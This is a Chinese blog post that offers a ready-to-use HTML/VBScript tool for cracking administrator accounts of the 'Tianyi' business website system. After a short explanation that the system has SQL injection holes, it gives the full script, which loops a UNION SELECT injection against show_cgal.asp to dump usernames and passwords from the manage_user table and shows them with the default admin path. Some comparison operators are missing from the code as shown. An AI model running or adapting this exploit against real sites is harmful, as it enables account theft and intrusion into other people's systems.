/**
慈勤强
http://blog.csdn.net/cqq
*/
自从上次写了个天意商务系统破解程序之后,
收到了不少朋友的来信,
有询问程序原理的,有询问如何防护的。
今天,我抽了一点时间,做了这个Html版,就只有这一个htm文件
相信有点html知识和SQLInjection知识的朋友都能够看懂
原理非常简单,破解用户帐号是用的SQLInjection方法,
因为这套系统好多地方存在sqlinjection漏洞,
然后自己下载个这套系统,就可以很方便的找出问题了。
以前是Vc++版本,现在是html版本,不过都是一样,
就是通过http协议取得网页的源文件
然后分析源文件,找到用户名和密码
并且显示出来。
下面是源代码,大家只要把这个文件保存到硬盘上,起名叫ty.htm,就可以了。
天意商务系统后台管理帐号破解html版--慈勤强制作 Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Sub OpenUrl(strUrl) strTmp = "" strUser = "!" strAAA ="" strCqq="" i=0 on Error Resume Next While Trim(strUser) "" strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2" Set xmlhttp = CreateObject("Microsoft.XMLHTTP") xmlhttp.open "GET",(strUrl + strPara),false xmlhttp.send strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "", "") If Trim(strAAA) "" Then arr = Split(strAAA, "***") strUser = arr(0) strCqq = strCqq + vbNewLine + "用户名:" + strUser + vbNewLine + "密 码:" + arr(1) + vbNewLine + vbNewLine Else strUser = "" End If //msgbox xmlhttp.Response Set xmlhttp = Nothing Wend If strCqq"" Then strCqq="破解的后台管理帐号为:(后台默认地址:"+strUrl+"/admin)"+vbCrLF+VBCRLF+strCqq+vbnewline cqqadmin.innerText=strCqq Else cqqadmin.innerText="出错" End If End Sub Function getMid(str, str1, str2) str11 = "" i = InStr(str, str1) If i > 0 Then j = InStr(i, str, str2) If j > 0 Then str11 = Mid(str, i + Len(str1), j - i - Len(str1)) End If End If getMid = str11 End Function
天意商务系统后台管理帐号破解html版 | Powered By Steven_Cee Http://blog.csdn.net/cqq |
帮助说明,请看 |
[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]